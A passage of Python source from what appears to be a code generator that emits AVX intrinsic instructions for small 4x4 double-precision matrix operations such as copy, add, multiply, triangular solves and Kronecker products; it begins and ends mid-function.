instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
elif UpperTriangular.test(mStruct, mAccess, M, N):
vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(i)]), range(i,M), isCompact) for i in range(M-1)]
vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(M-1)]), [M-1], isCompact))
# vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(i,M), isCompact) for i in range(M-1)]
# vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(0)]), [M-1], isCompact))
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'UpperTriang'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
elif AllEntriesConstantMatrix.test(mStruct, mAccess, M, N):
const_value = mStruct.keys()[0]._const_value
if M == 1 and N == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
if mParams['bcast']:
va = mm256Set1Pd(V(const_value))
else:
va = mm256SetPd(V(0), V(0), V(0), V(const_value))
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ Comment("Constant " + str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif N == 1 or M == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
consts = [ V(0) for _ in range(nu-max(M,N)) ] + [V(const_value) for _ in range(max(M,N))]
va = mm256SetPd(*consts)
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ Comment("Constant " + str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
else:
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
consts = [ V(0) for _ in range(nu-N) ] + [V(const_value) for _ in range(N)]
va = mm256SetPd(*consts)
vas = [ va for i in range(M) ]
instructions += [ Comment("Constant " + str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ mm256StoreGd(vas[i], pcs[i], range(nu)) for i in range(M) ]
instructions += [ mm256StoreGd(mm256SetzeroPd(), pcs[i], range(nu)) for i in range(M,nu) ]
elif IdentityMatrix.test(mStruct, mAccess, M, N):
ones = mm256Set1Pd(V(1))
zeros = mm256SetzeroPd()
vs = []
for i in range(M):
imm = 4*[0]
imm[3-i] = 1
vs.append( mm256BlendPd(zeros, ones, imm) )
for i in range(M,4):
vs.append( zeros )
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'Identity'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
return instructions
class _Dbl4BLAC(object):
def __init__(self):
super(_Dbl4BLAC, self).__init__()
def Zero(self, dParams, opts):
nu = 4
dst = dParams['nuM']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: Zero " + str(M) + "x" + str(N)) ]
if M*N == nu:
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256SetzeroPd(), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256SetzeroPd(), pc, range(nu))
instructions += [ instr ]
return instructions
def Copy(self, sParams, dParams, opts):
nu = 4
# these are the 3 Matrix objects involved
src, dst = sParams['nuM'], dParams['nuM']
# these are the index functions for the two dimensions of each of the matrices
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
# these are the sizes of the matrices
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: Copy " + str(M) + "x" + str(N)) ]
if M*N == nu:
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), [0, 1, 2, 3])
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(va, pc, [0, 1, 2, 3])
instructions.append(instr)
elif M == nu and N == nu:
vas = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3]) for i in range(4)]
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
instrs = [mm256StoreGd(va, pc, [0, 1, 2, 3]) for va, pc in zip(vas, pcs)]
instructions.extend(instrs)
for i in instructions:
i.bounds.update(dParams['bounds'])
return instructions
def Add(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(N) + " + " + str(M) + "x" + str(N)) ]
if M*N == nu:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(va, vb), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
va = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(va, vb), pc, range(nu))
instructions += [ instr ]
return instructions
def Neg(self, sParams, dParams, opts):
nu = 4
src, dst = sParams['nuM'], dParams['nuM']
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: -( " + str(M) + "x" + str(N) + " )") ]
if M*N == nu:
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256SubPd(mm256SetzeroPd(), va), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
va = mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256SubPd(mm256SetzeroPd(), va), pc, range(nu))
instructions += [ instr ]
return instructions
def Sub(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(N) + " - " + str(M) + "x" + str(N)) ]
if M*N == nu:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256SubPd(va, vb), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
va = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256SubPd(va, vb), pc, range(nu))
instructions += [ instr ]
return instructions
def _Div(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(N) + " / " + str(M) + "x" + str(N)) ]
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
# instr = mm256StoreGd(mm256DivPd(va, vb), pc, range(nu))
instr = mm256StoreGd(mm256CastPd128Pd256(mmDivPd(mm256CastPd256Pd128(va), mm256CastPd256Pd128(vb))), pc, range(nu))
instructions += [ instr ]
return instructions
def _Sqrt(self, sParams, dParams, opts):
nu = 4
src, dst = sParams['nuM'], dParams['nuM']
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: sqrt(" + str(M) + "x" + str(N) + ")") ]
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
# instr = mm256StoreGd(mm256SqrtPd(va), pc, range(nu))
instr = mm256StoreGd(mm256CastPd128Pd256(mmSqrtPd(mm256CastPd256Pd128(va))), pc, range(nu))
instructions += [ instr ]
return instructions
# def LDiv(self, s0Params, s1Params, dParams, opts):
# nu = 4
# src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
# s0L, s0R = s0Params['nuML'], s0Params['nuMR']
# s1L, s1R = s1Params['nuML'], s1Params['nuMR']
# dL, dR = dParams['nuML'], dParams['nuMR']
# oN, M, N = s1Params['N'], s0Params['nuMM'], s1Params['nuMN']
# s0Struct = s0Params['struct']
# instructions = []
#
# instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(M) + " \ " + str(M) + "x" + str(N)) ]
# if M == 1:
# va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
# if oN > 1:
# dupa00 = mm256UnpackloPd(va0, va0)
# va0 = mm256Permute2f128Pd(dupa00, dupa00, [0,0,1,0,0,0,0,0])
# vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# instructions += [ mm256StoreGd(mm256DivPd(vb, va0), pc, range(nu)) ]
# else:
# if s0Struct[Matrix] == Set("{[i,j]: 0<=i<"+str(M)+" and 0<=j<=i}") and s0Struct[ZeroMatrix] == Set("{[i,j]: 0<=i<"+str(M)+" and i<j<"+str(M)+"}"):
# if N == 1: #trsv forward-sub
# va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
# va1 = mm256LoadGd(Pointer(src0[s0L.of(1),s0R.of(0)]), range(nu))
# va2 = mm256LoadGd(Pointer(src0[s0L.of(2),s0R.of(0)]), range(nu))
# va3 = mm256LoadGd(Pointer(src0[s0L.of(3),s0R.of(0)]), range(nu))
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# tmp0 = mm256UnpackloPd(va0, va1)
# tmp1 = mm256UnpackloPd(va2, va3)
# tmp2 = mm256UnpackhiPd(va0, va1)
# tmp3 = mm256UnpackhiPd(va2, va3)
# col0 = mm256BlendPd(mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,0,0,0,0,0]), mm256SetzeroPd(), [0,0,0,1])
# col1 = mm256BlendPd(mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,0,0,0,0,0]), mm256SetzeroPd(), [0,0,1,0])
# col2 = mm256BlendPd(mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,1,0,0,0,1]), mm256SetzeroPd(), [0,1,0,0])
# vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
# d01 = mm256BlendPd(va0, va1, [0,0,1,0])
# d23 = mm256BlendPd(va2, va3, [1,0,0,0])
# diag = mm256BlendPd(d01, d23, [1,1,0,0])
# ones = mm256Set1Pd(sa(1.))
# rdiag = mm256DivPd(ones, diag)
# sol = mm256MulPd(rdiag, vb)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx0 = mm256UnpackloPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx0, dupx0, [0,0,1,0,0,0,0,0]) # Dup first lane
# cx0 = mm256MulPd(rdiag, mm256MulPd(col0, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx0)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx1 = mm256UnpackhiPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx1, dupx1, [0,0,1,0,0,0,0,0]) # Dup first lane
# cx1 = mm256MulPd(rdiag, mm256MulPd(col1, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx1)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx2 = mm256UnpackloPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx2, dupx2, [0,0,1,1,0,0,0,1]) # Dup second lane
# cx2 = mm256MulPd(rdiag, mm256MulPd(col2, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx2)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# else: #trsm
# vas = [ mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu)) for i in range(nu)]
# ones = mm256Set1Pd(sa(1.))
# ums = [ (mm256UnpackloPd,[0,0,1,0,0,0,0,0]), (mm256UnpackhiPd,[0,0,1,0,0,0,0,0]), (mm256UnpackloPd,[0,0,1,1,0,0,0,1]), (mm256UnpackhiPd,[0,0,1,1,0,0,0,1]) ]
# rdiags = [ ]
# for i in range(nu):
# upack, mask = ums[i]
# dupaii = upack(vas[i], vas[i])
# bcaii = mm256Permute2f128Pd(dupaii, dupaii, mask)
# rdiags.append(mm256DivPd(ones, bcaii))
# vbs = [ mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu)) for i in range(nu)]
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu)]
# #Solve X00, X01, X02, X03
# # dupa00 = mm256UnpackloPd(vas[0], vas[0])
# # sol = mm256DivPd(vbs[0], mm256Permute2f128Pd(dupa00, dupa00, [0,0,1,0,0,0,0,0]))
# sol = mm256MulPd(rdiags[0], vbs[0])
# instructions += [ mm256StoreGd(sol, pcs[0], range(nu)) ]
# #Solve X10, X11, X12, X13
# #bcast L10
# dupa10 = mm256UnpackloPd(vas[1], vas[1])
# bca10 = mm256Permute2f128Pd(dupa10, dupa10, [0,0,1,0,0,0,0,0])
# x0 = mm256LoadGd(pcs[0], range(nu))
# sol = mm256MulPd(rdiags[1], mm256SubPd(vbs[1], mm256MulPd(bca10, x0)))
# instructions += [ mm256StoreGd(sol, pcs[1], range(nu)) ]
# #Solve X2..
# #bcast L20, L21
# dupa20 = mm256UnpackloPd(vas[2], vas[2])
# bca20 = mm256Permute2f128Pd(dupa20, dupa20, [0,0,1,0,0,0,0,0])
# dupa21 = mm256UnpackhiPd(vas[2], vas[2])
# bca21 = mm256Permute2f128Pd(dupa21, dupa21, [0,0,1,0,0,0,0,0])
# x1 = mm256LoadGd(pcs[1], range(nu))
# sol = mm256MulPd(rdiags[2], mm256SubPd(mm256SubPd(vbs[2], mm256MulPd(bca20, x0)), mm256MulPd(bca21, x1)))
# instructions += [ mm256StoreGd(sol, pcs[2], range(nu)) ]
# #Solve X3..
# #bcast L30, L31, L32
# dupa30 = mm256UnpackloPd(vas[3], vas[3])
# bca30 = mm256Permute2f128Pd(dupa30, dupa30, [0,0,1,0,0,0,0,0])
# dupa31 = mm256UnpackhiPd(vas[3], vas[3])
# bca31 = mm256Permute2f128Pd(dupa31, dupa31, [0,0,1,0,0,0,0,0])
# dupa32 = dupa30
# bca32 = mm256Permute2f128Pd(dupa32, dupa32, [0,0,1,1,0,0,0,1])
# x2 = mm256LoadGd(pcs[2], range(nu))
# sol = mm256MulPd(rdiags[3], mm256SubPd(mm256SubPd(mm256SubPd(vbs[3], mm256MulPd(bca30, x0)), mm256MulPd(bca31, x1)), mm256MulPd(bca32, x2)))
# instructions += [ mm256StoreGd(sol, pcs[3], range(nu)) ]
# else:
# if N == 1: #trsv backward-sub
# va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
# va1 = mm256LoadGd(Pointer(src0[s0L.of(1),s0R.of(0)]), range(nu))
# va2 = mm256LoadGd(Pointer(src0[s0L.of(2),s0R.of(0)]), range(nu))
# va3 = mm256LoadGd(Pointer(src0[s0L.of(3),s0R.of(0)]), range(nu))
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# tmp0 = mm256UnpackloPd(va0, va1)
# tmp1 = mm256UnpackloPd(va2, va3)
# tmp2 = mm256UnpackhiPd(va0, va1)
# tmp3 = mm256UnpackhiPd(va2, va3)
# col1 = mm256BlendPd(mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,0,0,0,0,0]), mm256SetzeroPd(), [0,0,1,0])
# col2 = mm256BlendPd(mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,1,0,0,0,1]), mm256SetzeroPd(), [0,1,0,0])
# col3 = mm256BlendPd(mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,1,0,0,0,1]), mm256SetzeroPd(), [1,0,0,0])
# vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
# d01 = mm256BlendPd(va0, va1, [0,0,1,0])
# d23 = mm256BlendPd(va2, va3, [1,0,0,0])
# diag = mm256BlendPd(d01, d23, [1,1,0,0])
# ones = mm256Set1Pd(sa(1.))
# rdiag = mm256DivPd(ones, diag)
# sol = mm256MulPd(rdiag, vb)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx3 = mm256UnpackhiPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx3, dupx3, [0,0,1,1,0,0,0,1]) # Dup second lane: x3 x3 x3 x3
# cx3 = mm256MulPd(rdiag, mm256MulPd(col3, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx3)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx2 = mm256UnpackloPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx2, dupx2, [0,0,1,1,0,0,0,1]) # Dup second lane
# cx2 = mm256MulPd(rdiag, mm256MulPd(col2, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx2)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# dupx1 = mm256UnpackhiPd(mm256LoadGd(pc, range(4)), mm256LoadGd(pc, range(4)))
# dupLane = mm256Permute2f128Pd(dupx1, dupx1, [0,0,1,0,0,0,0,0]) # Dup first lane
# cx1 = mm256MulPd(rdiag, mm256MulPd(col1, dupLane))
# sol = mm256SubPd(mm256LoadGd(pc, range(nu)), cx1)
# instructions += [ mm256StoreGd(sol, pc, range(nu)) ]
# else: #trsm
# vas = [ mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu)) for i in range(nu)]
# ones = mm256Set1Pd(sa(1.))
# ums = [ (mm256UnpackloPd,[0,0,1,0,0,0,0,0]), (mm256UnpackhiPd,[0,0,1,0,0,0,0,0]), (mm256UnpackloPd,[0,0,1,1,0,0,0,1]), (mm256UnpackhiPd,[0,0,1,1,0,0,0,1]) ]
# rdiags = [ ]
# for i in range(nu):
# upack, mask = ums[i]
# dupaii = upack(vas[i], vas[i])
# bcaii = mm256Permute2f128Pd(dupaii, dupaii, mask)
# rdiags.append(mm256DivPd(ones, bcaii))
# vbs = [ mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu)) for i in range(nu)]
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu)]
# #Solve X30, X31, X32, X33
# sol = mm256MulPd(rdiags[3], vbs[3])
# instructions += [ mm256StoreGd(sol, pcs[3], range(nu)) ]
# #Solve X20, X21, X22, X23
# #bcast U23
# dupa23 = mm256UnpackhiPd(vas[2], vas[2])
# bca23 = mm256Permute2f128Pd(dupa23, dupa23, [0,0,1,1,0,0,0,1])
# x3 = mm256LoadGd(pcs[3], range(nu))
# sol = mm256MulPd(rdiags[2], mm256SubPd(vbs[2], mm256MulPd(bca23, x3)))
# instructions += [ mm256StoreGd(sol, pcs[2], range(nu)) ]
# #Solve X1..
# #bcast U12, U13
# dupa12 = mm256UnpackloPd(vas[1], vas[1])
# bca12 = mm256Permute2f128Pd(dupa12, dupa12, [0,0,1,1,0,0,0,1])
# dupa13 = mm256UnpackhiPd(vas[1], vas[1])
# bca13 = mm256Permute2f128Pd(dupa13, dupa13, [0,0,1,1,0,0,0,1])
# x2 = mm256LoadGd(pcs[2], range(nu))
# sol = mm256MulPd(rdiags[1], mm256SubPd(mm256SubPd(vbs[1], mm256MulPd(bca12, x2)), mm256MulPd(bca13, x3)))
# instructions += [ mm256StoreGd(sol, pcs[1], range(nu)) ]
# #Solve X0..
# #bcast U01, U02, U03
# dupa01 = mm256UnpackhiPd(vas[0], vas[0])
# bca01 = mm256Permute2f128Pd(dupa01, dupa01, [0,0,1,0,0,0,0,0])
# dupa02 = mm256UnpackloPd(vas[0], vas[0])
# bca02 = mm256Permute2f128Pd(dupa02, dupa02, [0,0,1,1,0,0,0,1])
# dupa03 = dupa01
# bca03 = mm256Permute2f128Pd(dupa03, dupa03, [0,0,1,1,0,0,0,1])
# x1 = mm256LoadGd(pcs[1], range(nu))
# sol = mm256MulPd(rdiags[0], mm256SubPd(mm256SubPd(mm256SubPd(vbs[0], mm256MulPd(bca01, x1)), mm256MulPd(bca02, x2)), mm256MulPd(bca03, x3)))
# instructions += [ mm256StoreGd(sol, pcs[0], range(nu)) ]
#
# return instructions
def Mul(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, K, N = s0Params['nuMM'], s0Params['nuMN'], s1Params['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(K) + " * " + str(K) + "x" + str(N)) ]
if M == 1:
if N == 1:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
vmul = mm256MulPd(va, vb)
vper = mm256Permute2f128Pd(vmul, vmul, [1,0,0,0,0,0,0,1])
vadd0 = mm256AddPd(vmul, vper)
vble = mm256BlendPd(vadd0, mm256SetzeroPd(), [1,1,1,0])
vshu = mm256ShufflePd(vadd0, vadd0, [0,0,0,1])
vadd1 = mm256AddPd(vble, vshu)
instr = mm256StoreGd(vadd1, pc, range(nu))
instructions += [ instr ]
else:
vb0 = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
vb1 = mm256LoadGd(Pointer(src1[s1L.of(1),s1R.of(0)]), range(nu))
vb2 = mm256LoadGd(Pointer(src1[s1L.of(2),s1R.of(0)]), range(nu))
vb3 = mm256LoadGd(Pointer(src1[s1L.of(3),s1R.of(0)]), range(nu))
va00 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), [tuple(range(nu))])
va01 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(1)]), [tuple(range(nu))])
va02 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(2)]), [tuple(range(nu))])
va03 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(3)]), [tuple(range(nu))])
mul0 = mm256MulPd(va00, vb0)
mul1 = mm256MulPd(va01, vb1)
add0 = mm256AddPd(mul0, mul1)
mul2 = mm256MulPd(va02, vb2)
mul3 = mm256MulPd(va03, vb3)
add1 = mm256AddPd(mul2, mul3)
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(add0, add1), pc, range(nu))
instructions += [ instr ]
else:
if K == 1:
va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), [tuple(range(nu))])
va1 = mm256LoadGd(Pointer(src0[s0L.of(1),s0R.of(0)]), [tuple(range(nu))])
va2 = mm256LoadGd(Pointer(src0[s0L.of(2),s0R.of(0)]), [tuple(range(nu))])
va3 = mm256LoadGd(Pointer(src0[s0L.of(3),s0R.of(0)]), [tuple(range(nu))])
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc0 = Pointer(dst[dL.of(0),dR.of(0)])
pc1 = Pointer(dst[dL.of(1),dR.of(0)])
pc2 = Pointer(dst[dL.of(2),dR.of(0)])
pc3 = Pointer(dst[dL.of(3),dR.of(0)])
instr0 = mm256StoreGd(mm256MulPd(va0, vb), pc0, range(nu))
instr1 = mm256StoreGd(mm256MulPd(va1, vb), pc1, range(nu))
instr2 = mm256StoreGd(mm256MulPd(va2, vb), pc2, range(nu))
instr3 = mm256StoreGd(mm256MulPd(va3, vb), pc3, range(nu))
instructions += [ instr0, instr1, instr2, instr3 ]
else:
if N == 1:
va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
va1 = mm256LoadGd(Pointer(src0[s0L.of(1),s0R.of(0)]), range(nu))
va2 = mm256LoadGd(Pointer(src0[s0L.of(2),s0R.of(0)]), range(nu))
va3 = mm256LoadGd(Pointer(src0[s0L.of(3),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
mul0 = mm256MulPd(va0, vb)
mul1 = mm256MulPd(va1, vb)
mul2 = mm256MulPd(va2, vb)
mul3 = mm256MulPd(va3, vb)
hadd0 = mm256HaddPd(mul0, mul1)
hadd1 = mm256HaddPd(mul2, mul3)
vper = mm256Permute2f128Pd(hadd0, hadd1, [0,0,1,0,0,0,0,1])
vble = mm256BlendPd(hadd0, hadd1, [1,1,0,0])
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(vper, vble), pc, range(nu))
instructions += [ instr ]
else:
vb0 = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
vb1 = mm256LoadGd(Pointer(src1[s1L.of(1),s1R.of(0)]), range(nu))
vb2 = mm256LoadGd(Pointer(src1[s1L.of(2),s1R.of(0)]), range(nu))
vb3 = mm256LoadGd(Pointer(src1[s1L.of(3),s1R.of(0)]), range(nu))
for i in range(nu):
vai0 = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), [tuple(range(nu))])
vai1 = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(1)]), [tuple(range(nu))])
vai2 = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(2)]), [tuple(range(nu))])
vai3 = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(3)]), [tuple(range(nu))])
mul0 = mm256MulPd(vai0, vb0)
mul1 = mm256MulPd(vai1, vb1)
add0 = mm256AddPd(mul0, mul1)
mul2 = mm256MulPd(vai2, vb2)
mul3 = mm256MulPd(vai3, vb3)
add1 = mm256AddPd(mul2, mul3)
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(add0, add1), pc, range(nu))
instructions += [ instr ]
return instructions
def Kro(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
oM, oK, oN, oP = s0Params['M'], s0Params['N'], s1Params['M'], s1Params['N']
M, K, N, P = s0Params['nuMM'], s0Params['nuMN'], s1Params['nuMM'], s1Params['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(K) + " Kro " + str(N) + "x" + str(P)) ]
if oM*oK*oN*oP == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
instr = mm256StoreGd(mm256MulPd(va, vb), pc, range(nu))
instructions += [ instr ]
elif oM*oK == 1:
if s0Params['bcast']:
dup = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
else:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
repva = mm256Permute2f128Pd(va, va, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
dup = mm256ShufflePd(repva, repva, (0,0,0,0))
if N*P == nu:
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256MulPd(dup, vb), pc, range(nu))
instructions += [ instr ]
else:
